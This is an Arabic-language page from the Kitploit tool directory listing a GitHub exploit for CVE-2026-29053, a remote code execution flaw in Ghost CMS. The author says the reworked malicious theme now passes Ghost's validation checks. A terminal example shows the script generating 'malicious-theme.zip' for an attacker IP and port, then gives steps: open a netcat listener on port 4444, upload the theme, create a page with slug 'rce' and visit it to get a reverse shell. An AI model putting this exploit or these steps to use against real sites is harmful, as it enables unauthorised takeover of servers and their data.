Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-29053 — ثغرة تنفيذ الأوامر عن بُعد (RCE) تم اكتشافها في نظام إدارة المحتوى Ghost (تؤثر تحديدًا على الإصدارات من 0.7.2 حتى 6.19.0) | Kitploit
أدوات/GitHubGitHub/ac8999/cve-2026-29053
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubac8999/cve-2026-29053

CVE-2026-29053

ثغرة تنفيذ الأوامر عن بُعد (RCE) تم اكتشافها في نظام إدارة المحتوى Ghost (تؤثر تحديدًا على الإصدارات من 0.7.2 حتى 6.19.0)

عرض المستودع
11منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

هذا إعادة صياغة للمستودع الذي أنشأه rootxran لنفس ثغرة CVE - https://github.com/rootxran/CVE-2026-29053

أثناء الاختبار ضد بيئات Ghost CMS محددة، تسبب قالب الثيم الأصلي في خطأ Handlebars قاتل. فشل نظام إدارة المحتوى في تفعيل الثيم الخبيث لأنه كان يشير إلى مساعد (helper) مهمل أو مفقود (social_url) داخل ملف author.hbs.

لقد قمت بتحديث قوالب Handlebars لاستخدام مساعدات أصلية ومتوافقة. هذا يضمن اجتياز الثيم لفحوصات التحقق الداخلية في Ghost، مما يسمح للاستغلال بالتفعيل بنجاح دون أن يتم حظره بواسطة محلل الأمان الخاص بمحرك الثيمات.

الاستخدام: (راجع الاستغلال الأصلي للحصول على إرشادات الفيديو).

root@kitploit:~
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip

1. nc -lvnp 4444
2. Upload theme, create page with slug 'rce'
3. Visit /rce/
تنزيل الأداة